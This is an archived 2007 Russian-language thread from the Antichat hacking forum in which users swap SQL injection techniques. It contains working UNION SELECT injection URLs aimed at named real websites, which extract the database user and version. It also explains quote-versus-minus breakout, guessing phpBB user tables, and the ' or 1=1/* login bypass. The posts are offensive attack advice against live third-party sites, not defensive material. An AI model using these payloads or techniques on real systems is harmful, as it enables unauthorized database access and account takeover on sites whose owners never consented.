ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
05.11.2007, 04:32
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290
Репутация:
474
|
|
>у меня еще несколько вопросов.
>1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
http://www.wolfpublishers.nl/us/news.php?id=-15%20union%20select%201,2,3,4,5,6/*
>2. когда надо ставить перед значением параметра минус, а когда кавычку после?
Зависит от самого запроса, например
Код:
"SELECT `date`,`post` FROM `forum` where id='".$id."' and id > 5;"
тут нужно будет ставить кавычку и получится
Код:
"SELECT `date`,`post` FROM `forum` where id=''SQL-inj /* and id > 5;'"
т.е. мы "выходим" из id=''
- ставить не обязательно, нужно лишь чтобы "левы" (не наш) запрос не выполнился, это можно сделать "-", and 1=0, or 1=1, limit 0 и т.д.
>3. что можно сделать, кроме брута, если версия бд меньше 5?
посимвольный подбор\угадывание. Если сайт на паблик двиге - установить двиг и посмотреть |
|
|
05.11.2007, 04:32
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
1. Это скуля
Код:
http://www.wolfpublishers.nl/us/news.php?id=-15%20union%20select%201,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4,5,6/*
2. когда перменная строкового типа (присутствуют не только цифры) надо ставить кавычку
когда переменная "числовая" надо ставить минус (хотя и не обязательно), но бывает, что даже если присутствуют только цифры, это все равно переменная строкового типа, в таком случае надо ставить кавычку... (т.е. закрывать для корректности запроса)
3. только искать заранее известные таблицы, например если есть на сайте форум phpBB, то логично искать табличку phpbb_users, хотя иногда форум располагается в другой БД, тогда надо знать еще и имя БД форума, также при установке форума, иногда меняют префикс (phpbb_) тогда его тоже нужно подбирать
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2007, 04:33
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Сообщение от Piflit
у меня еще несколько вопросов.
1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
тут просто ошибка скрипта, а скуля нет, так?
с чего ты взял? здесь сто процентная иньекция -
Код:
http://www.wolfpublishers.nl/us/news.php?id=15+union+select+1,2,convert(version()+using+latin1),4,5,6/*
2. когда надо ставить перед значением параметра минус, а когда кавычку после?
Минус ставиться для перехода к несуществующим значениям переменной, делаеться в тех случях когда при правельном запросе возвращаеться исходная страница и не видно принтабельных столбцов ( можно перейти не только с помощью минуса но и влепить слишком большое значие e.x =999999+union..
3. что можно сделать, кроме брута, если версия бд меньше 5?
Что ты подрузомеваешь под брутом, если перебор действительных значений таблиц и колонок то да
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
05.11.2007, 14:12
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
http://www.hackzona.ru/hz.php?name=F...wtopic&t=14033
при этом запросе хакзона пишет
PHP код:
Общая ошибка
Could not obtain user vote data for this topic
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 4
SELECT vote_id FROM voov_bbvote_voters WHERE vote_id = 331 AND vote_user_id =
Line : 747
File : /usr/home/www/a11/modules/Forums/viewtopic.php
это скуль?, если да то в каком параметре он?
|
|
|
|
05.11.2007, 14:20
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
http://www.hackzona.ru/hz.php?name=Forums&file=viewtopic&t=14033 при этом запросе хакзона пишет
Только что ходил по ссылке - все нормально.
|
|
|
|
05.11.2007, 15:09
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
мля я захожу у меня ошибка sql синтаксиса пишет хз
|
|
|
|
05.11.2007, 19:14
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
http://se-t.net/index.php?pg=
Есть ли тут инклюд?
|
|
|
|
05.11.2007, 19:17
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Сообщение от delay(0)
http://se-t.net/index.php?pg=
Есть ли тут инклюд?
Нет. Там есть функция file и вряд ли что получится сделать.
|
|
|
|
06.11.2007, 15:18
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
Ребят может не в тему, но каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?
|
|
|
|
06.11.2007, 15:25
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
2 nikoTM
Примерно таким:
$mysql_query="SELECT * FROM prefix_users WHERE username=' ".$username." ' and password='".$password.'";
Тогда при вставке твоего кода получается:
$mysql_query="SELECT * FROM prefix_users WHERE username=' ' or 1=1/*" ' and password='".$password."';
То есть если нет пользователя с пустым именем, то извлекается первый попавшийся пользователь.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 06.11.2007 в 15:30..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
